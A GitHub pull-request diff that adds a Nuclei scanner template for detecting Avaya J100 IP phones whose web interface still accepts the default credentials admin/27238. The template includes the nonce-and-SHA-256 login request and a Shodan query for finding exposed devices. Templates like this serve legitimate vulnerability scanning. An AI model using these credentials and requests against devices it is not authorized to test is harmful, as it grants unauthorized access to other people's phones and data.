Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
62 changes: 62 additions & 0 deletions http/default-logins/avaya-phone-default-login.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,62 @@
id: avaya-phone-default-login

info:
name: Avaya Phone Web Interface - Default Login
author: tpierru
severity: high
description: |
Avaya phone web interface contains a default login vulnerability. An attacker can obtain access to sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://documentation.avaya.com/bundle/InstallandadminJ100seriesIPPhone_r4.1.x/page/Logging_into_web_UI.html
classification:
cwe-id: CWE-1392
metadata:
verified: true
max-requests: 1
shodan-query: html:"Avaya J179 Phone"
tags: default-login,avaya,misconfig

variables:
username: "admin"
password: "27238"

flow: http(1) && http(2)

http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/J100WebServer.cgi?Operation=0"

extractors:
- type: kval
name: nonce
kval:
- j100nonce
internal: true

- raw:
- |
POST /cgi-bin/J100WebServer.cgi?Operation=1 HTTP/1.1
Host: {{Host}}
Content-Type: application/x-www-form-urlencoded

uname={{username}}&psw={{sha256(concat(password,nonce))}}

matchers-condition: and
matchers:
- type: word
part: body
words:
- "/cgi-bin/J100WebServer.cgi?Operation=211"
- "id=\"redirectToDefault"
condition: or

- type: word
part: body
words:
- "Invalid username or password"
negative: true

- type: status
status:
- 200
Loading